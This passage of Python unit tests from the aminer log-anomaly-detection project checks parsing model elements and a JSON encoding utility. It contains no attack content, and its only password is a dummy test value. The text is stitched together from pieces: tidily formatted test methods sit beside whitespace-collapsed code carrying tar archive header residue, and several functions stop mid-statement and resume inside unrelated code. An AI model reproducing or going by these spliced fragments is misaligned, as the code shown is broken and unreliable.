    for c in b"aceghijklnopqrtuvwxyABCDEFGIJKLNOPQRTUVWXZ":
        self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%" + bytes([c]), None, None)])
    # Only %% and %z may appear more than once in one format.
    MultiLocaleDateTimeModelElement(self.id_, [(b"%%%z%z", None, None)])
    for c in allowed_format_specifiers.replace(b"%", b"").replace(b"z", b""):
        doubled = b"%" + bytes([c]) + b"%" + bytes([c])
        self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(doubled, None, None)])
    # Structural checks on the format tuples themselves.
    self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%s%z%f", None)])
    self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"", None, None)])  # empty format
    for bad_format in (None, "", 123, 123.22, True, {"id": "path"}, ["path"], [], (), set()):
        self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(bad_format, None, None)])
    self.assertRaises(
        TypeError, MultiLocaleDateTimeModelElement, self.id_, [[b"%d.%m.%Y %H:%M:%S", None, None]])  # list instead of tuple
    for wrong_arity in (
            (), tuple(b"%d.%m.%Y %H:%M:%S"), (b"%d.%m.%Y %H:%M:%S", None), (b"%d.%m.%Y %H:%M:%S", None, None, None)):
        self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [wrong_arity])
def test20time_zone_input_validation(self):
    """
    Check the validation of the time_zone entry of each date format tuple.

    A time_zone of None must default to UTC on every sub-element, timezone.utc and every pytz time zone must be
    accepted, and any other type (bytes, str, int, float, bool, list, dict) must raise TypeError.
    """
    en_gb_utf8 = "en_GB.utf8"
    en_us_utf8 = "en_US.utf8"
    de_at_utf8 = "de_AT.utf8"
    formats_without_time_zone = [
        (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None),
        (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8),
        (b"%H:%M:%S", None, None), (b"%d %b %Y", None, en_gb_utf8), (b"%dth %b %Y", None, en_gb_utf8),
        (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8), (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)]
    multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, formats_without_time_zone)
    # None must be normalised to UTC for every sub-element.
    for dtme in multi_locale_dtme.date_time_model_elements:
        self.assertEqual(dtme.time_zone, timezone.utc)
    MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)])
    for tz in pytz.all_timezones:
        MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", pytz.timezone(tz), None)])
    # Anything that is not a tzinfo must be rejected, including time zone names given as strings.
    for bad_time_zone in (b"", "UTC", 1, 1.25, True, [timezone.utc], {"time_zone": timezone.utc}):
        self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", bad_time_zone, None)])
def test22start_year_input_validation(self):
    """
    Check the validation of start_year.

    None must default to the current year, integers (including negative ones such as -630) are accepted, and
    strings, booleans, floats, lists and dicts must raise TypeError.
    """
    multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], None)
    # NOTE(review): compares against the local clock's year; around New Year this can disagree with an
    # implementation that derives the default from a different clock or time zone.
    self.assertEqual(multi_locale_dtme.start_year, datetime.now().year)
    for accepted_year in (2020, -630):
        MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], accepted_year)
    for bad_year in ("2020", True, 1.25, [2020], {"key": 2020}):
        self.assertRaises(
            TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], bad_year)
class OptionalMatchModelElementTest(TestBase):
    """
    Unittests for the OptionalMatchModelElement.

    An optional element wraps another model element; the tests below check the wrapped element's match is passed
    through, what is reported when the wrapped element does not match, and the constructor and get_match_element
    argument validation.
    """

    id_ = "optional"
    path = "path"
    fixed_id = "fixed"
    fixed_data = b"fixed data"

    def _make_optional(self):
        """Build an OptionalMatchModelElement around a fixed-data dummy element; return both."""
        fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data)
        return OptionalMatchModelElement(self.id_, fixed_dme), fixed_dme

    def test1get_match_element_valid_match(self):
        """Parse a matching prefix and check the wrapped element's match is reported as the single child."""
        data = b"fixed data string."
        optional_match, fixed_dme = self._make_optional()
        match_context = DummyMatchContext(data)
        match_element = optional_match.get_match_element(self.path, match_context)
        expected_child = fixed_dme.get_match_element("%s/%s" % (self.path, self.id_), DummyMatchContext(data))
        self.compare_match_results(
            data, match_element, match_context, self.id_, self.path, self.fixed_data, self.fixed_data, [expected_child])

    def test2get_match_element_no_match(self):
        """
        Parse input the wrapped element does not match.

        For both an empty input and a non-matching string the results are compared against an empty match string,
        a None match object and no children, i.e. the MatchContext must not have been consumed.
        """
        optional_match, _ = self._make_optional()
        for data in (b"", b"other fixed string"):
            match_context = DummyMatchContext(data)
            match_element = optional_match.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_, self.path, b"", None, None)

    def test3element_id_input_validation(self):
        """Check that an empty element_id raises ValueError and non-str element_ids raise TypeError."""
        fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data)
        self.assertRaises(ValueError, OptionalMatchModelElement, "", fixed_dme)
        for bad_id in (None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, OptionalMatchModelElement, bad_id, fixed_dme)

    def test4optional_element_input_validation(self):
        """Check that anything but a model element is rejected as optional_element with TypeError."""
        for bad_element in ("fixed_dme", None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, bad_element)

    def test5get_match_element_match_context_input_validation(self):
        """Check that get_match_element accepts MatchContext-like objects only and raises AttributeError otherwise."""
        model_element, _ = self._make_optional()
        data = b"fixed data"
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        bad_contexts = (
            MatchElement(None, data, None, None), data, data.decode(), 123, 123.22, True, None, [],
            {"key": MatchContext(data)}, set(), (), model_element)
        for bad_context in bad_contexts:
            self.assertRaises(AttributeError, model_element.get_match_element, self.path, bad_context)
MatchElement("b1", b"b1", b"b1", [b2]) root_element = MatchElement("root", b"root", b"root", [a1, b1]) parser_match = ParserMatch(root_element) dictionary = parser_match.get_match_dictionary() self.assertEqual(dictionary["root"], root_element) self.assertEqual(dictionary["a1"], a1) self.assertEqual(dictionary["a2"], a2) self.assertEqual(dictionary["a3"], a3) self.assertEqual(dictionary["b1"], b1) self.assertEqual(dictionary["b2"], b2) self.assertEqual(dictionary["b3"], b3) def test3match_element_input_validation(self): """Check if element_id is validated.""" self.assertRaises(TypeError, ParserMatch, "string") self.assertRaises(TypeError, ParserMatch, None) self.assertRaises(TypeError, ParserMatch, b"path") self.assertRaises(TypeError, ParserMatch, 123) self.assertRaises(TypeError, ParserMatch, 123.22) self.assertRaises(TypeError, ParserMatch, True) self.assertRaises(TypeError, ParserMatch, {"id": "path"}) self.assertRaises(TypeError, ParserMatch, ["path"]) self.assertRaises(TypeError, ParserMatch, []) self.assertRaises(TypeError, ParserMatch, ()) self.assertRaises(TypeError, ParserMatch, set()) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/RepeatedElementDataModelElementTest.py000066400000000000000000000353061437606560100330000ustar00rootroot00000000000000import unittest from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement class RepeatedElementDataModelElementTest(TestBase): """Unittests for the RepeatedElementDataModelElement.""" id_ = "repeated" path = "path" fixed_id = "fixed" fixed_data = b"fixed data " def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" fixed_dme = 
def test2get_match_element_min_max_repeats(self):
    """
    Verify the min_repeat/max_repeat bounds.

    Two elements are used: one allowing 2 to 5 repetitions of the fixed data and one fixed to exactly 3. For 0 to 6
    repetitions each element must match, with one child per repetition, only when the count lies inside its
    bounds. Inputs with more repetitions than max_repeat are expected to yield no match rather than a truncated one.
    """
    fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data)
    repeated_dme = RepeatedElementDataModelElement(self.id_, fixed_dme, min_repeat=2, max_repeat=5)
    same_min_max_repeat_dme = RepeatedElementDataModelElement(self.id_, fixed_dme, min_repeat=3, max_repeat=3)
    inputs = [b"other data"] + [self.fixed_data * count for count in range(1, 7)]
    for data in inputs:
        repetitions = data.count(self.fixed_data)
        for dme, lower, upper in ((repeated_dme, 2, 5), (same_min_max_repeat_dme, 3, 3)):
            match_context = DummyMatchContext(data)
            match_element = dme.get_match_element(self.path, match_context)
            if lower <= repetitions <= upper:
                # One child per repetition, addressed as <path>/<id>/<index>.
                children = [
                    fixed_dme.get_match_element("%s/%s/%d" % (self.path, self.id_, index), DummyMatchContext(data))
                    for index in range(repetitions)]
                self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, children)
            else:
                self.compare_no_match_results(data, match_element, match_context)
RepeatedElementDataModelElement, self.id_, b"path") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, True) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, 123) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, 123.22) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, {"id": "path"}) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, ["path"]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, []) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, ()) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, set()) def test5min_repeat_input_validation(self): """Check if min_repeat is validated.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat="string") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=None) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=b"path") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=True) self.assertRaises(ValueError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=-1) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=123.22) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat={"id": "path"}) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=["path"]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=[]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=()) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=set()) def 
test6max_repeat_input_validation(self): """Check if max_repeat is validated.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat="string") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=None) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=b"path") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=True) self.assertRaises(ValueError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=0) self.assertRaises(ValueError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=10, min_repeat=11) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=123.22) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat={"id": "path"}) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=["path"]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=[]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=()) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=set()) def test7get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = RepeatedElementDataModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data)) data = b"fixed data" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, 
model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/SequenceModelElementTest.py000066400000000000000000000133141437606560100307060ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.SequenceModelElement import SequenceModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement class SequenceModelElementTest(TestBase): """Unittests for the SequenceModelElement.""" id_ = "sequence" path = "path" children = [DummyFixedDataModelElement("0", b"string0 "), DummyFixedDataModelElement("1", b"string1 "), DummyFixedDataModelElement("2", b"string2")] match_elements = [MatchElement("path/sequence/0", b"string0 ", b"string0 ", None), MatchElement("path/sequence/1", b"string1 ", b"string1 ", None), MatchElement("path/sequence/2", b"string2", b"string2", None)] def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the 
MatchContext was updated with all characters.""" data = b"string0 string1 string2" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, self.match_elements) data = b"string0 string1 string2 other string follows" value = b"string0 string1 string2" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, self.match_elements) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"string0 string1 " match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"string0 string1 string3" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"string0 string0 string2" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): 
"""Check if element_id is validated.""" self.assertRaises(ValueError, SequenceModelElement, "", self.children) self.assertRaises(TypeError, SequenceModelElement, None, self.children) self.assertRaises(TypeError, SequenceModelElement, b"path", self.children) self.assertRaises(TypeError, SequenceModelElement, True, self.children) self.assertRaises(TypeError, SequenceModelElement, 123, self.children) self.assertRaises(TypeError, SequenceModelElement, 123.22, self.children) self.assertRaises(TypeError, SequenceModelElement, {"id": "path"}, self.children) self.assertRaises(TypeError, SequenceModelElement, ["path"], self.children) self.assertRaises(TypeError, SequenceModelElement, [], self.children) self.assertRaises(TypeError, SequenceModelElement, (), self.children) self.assertRaises(TypeError, SequenceModelElement, set(), self.children) def test4get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = SequenceModelElement(self.id_, self.children) data = b"string0 string1 string2" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, 
model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/VariableByteDataModelElementTest.py000066400000000000000000000130141437606560100322760ustar00rootroot00000000000000import unittest from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class VariableByteDataModelElementTest(TestBase): """Unittests for the VariableByteDataModelElement.""" id_ = "variable" path = "path" alphabet = b"abcdefghijklmnopqrstuvwxyz " def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"abcdefghijklm nopqrstuvwxyz.!?" value = b"abcdefghijklm nopqrstuvwxyz" match_context = DummyMatchContext(data) variable_byte_dme = VariableByteDataModelElement(self.id_, self.alphabet) match_element = variable_byte_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) variable_byte_dme = VariableByteDataModelElement(self.id_, self.alphabet) match_element = variable_byte_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"!abcdefghijklm nopqrstuvwxyz.!?" 
match_context = DummyMatchContext(data) variable_byte_dme = VariableByteDataModelElement(self.id_, self.alphabet) match_element = variable_byte_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, VariableByteDataModelElement, "", self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, None, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, b"path", self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, True, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, 123, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, 123.22, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, {"id": "path"}, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, ["path"], self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, [], self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, (), self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, set(), self.alphabet) def test4alphabet_input_validation(self): """Check if element_id is validated.""" self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, "string") self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, None) self.assertRaises(ValueError, VariableByteDataModelElement, self.id_, b"") self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, True) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, 123) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, 123.22) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, {"id": "path"}) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, ["path"]) self.assertRaises(TypeError, VariableByteDataModelElement, 
self.id_, []) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, ()) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, set()) def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = VariableByteDataModelElement(self.id_, self.alphabet) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/WhiteSpaceLimitedDataModelElementTest.py000066400000000000000000000153721437606560100333020ustar00rootroot00000000000000import unittest from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement from 
aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class WhiteSpaceLimitedDataModelElementTest(TestBase): """Unittests for the WhiteSpaceLimitedDataModelElement.""" id_ = "whitespace" path = "path" def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"space: ,tab:\t" value = b"space:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"tab:\t,space: " value = b"tab:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"This+is+a+string+without+any+whitespaces." match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, None) data = b"This is a string with whitespaces." 
value = b"This" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"space: ,tab:\t" value = b"space:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"tab:\t\t,space: " value = b"tab:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"spacetab: \t,tab:\t" value = b"spacetab:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"\ttab" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" space" match_context = DummyMatchContext(data) whitespace_dme 
= WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, WhiteSpaceLimitedDataModelElement, "") self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, None) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, b"path") self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, True) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, 123) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, 123.22) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, {"id": "path"}) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, ["path"]) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, []) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, ()) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, set()) def test4get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = WhiteSpaceLimitedDataModelElement(self.id_) data = b"space: ,tab:\t" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) 
self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/__init__.py000066400000000000000000000000001437606560100255260ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/000077500000000000000000000000001437606560100227415ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/JsonUtilTest.py000066400000000000000000000063741437606560100257340ustar00rootroot00000000000000import unittest from aminer.util.JsonUtil import encode_object, decode_object, dump_as_json, load_json from unit.TestBase import TestBase class JsonUtilTest(TestBase): """Unittests for the JsonUtil class.""" def test1encode_decode_strings2_json(self): """This test method encodes/decodes string objects into/from the JSON-format.""" s = 'this is a normal string to be serialized' pre = 'string:' enc = encode_object(s) self.assertEqual(enc, pre + s) self.assertEqual(decode_object(enc), s) def test2encode_decode_bytes2_json(self): """This test method encodes/decodes bytes objects into/from the JSON-format.""" s = b'this is a bytestring to be serialized' pre = b'bytes:' enc = encode_object(s) self.assertEqual(enc, pre.decode() + s.decode()) self.assertEqual(decode_object(s), s) self.assertEqual(decode_object(enc), s) s = bytes.fromhex('001B') enc = encode_object(s) self.assertEqual(enc, pre.decode() + '%00%1b') self.assertEqual(decode_object(enc), s) def 
test3encode_decode_iterables2_json(self): """This test method encodes/decodes list, tuple and dictionary objects into/from the JSON-format.""" lis = [b'1', '2', 3, ['4']] res = ['bytes:1', 'string:2', 3, ['string:4']] enc = encode_object(lis) self.assertEqual(enc, res) self.assertEqual(decode_object(enc), lis) tup = (b'1', '2', 3, ['4']) enc = encode_object(tup) self.assertEqual(enc, res) self.assertEqual(decode_object(enc), lis) dictionary = {'user': 'defaultUser', 'password': b'topSecret', 'id': 25} enc = encode_object(dictionary) self.assertEqual(enc, {'string:user': 'string:defaultUser', 'string:password': 'bytes:topSecret', 'string:id': 25}) self.assertEqual(decode_object(enc), dictionary) def test4encode_decode_booleans2_json(self): """This test method encodes/decodes booleans objects into/from the JSON-format.""" boolean1 = True enc = encode_object(boolean1) self.assertEqual(enc, True) self.assertEqual(decode_object(enc), True) def test5encode_decode_decimals2_json(self): """This test method encodes/decodes integer and float objects into/from the JSON-format.""" integer1 = 125 enc = encode_object(integer1) self.assertEqual(enc, 125) self.assertEqual(decode_object(enc), 125) def test6dump_as_json(self): """ This test method serializes an object by encoding it into a JSON-formatted string. Annotation: external classes and methods are not tested and assumed to be working as intend. """ tup = (b'1', '2', 3, ['4']) self.assertEqual(dump_as_json(tup), '["bytes:1", "string:2", 3, ["string:4"]]') def test7load_json(self): """ This test method loads a serialized string and deserializes it by decoding into an object. Annotation: external classes and methods are not tested and assumed to be working as 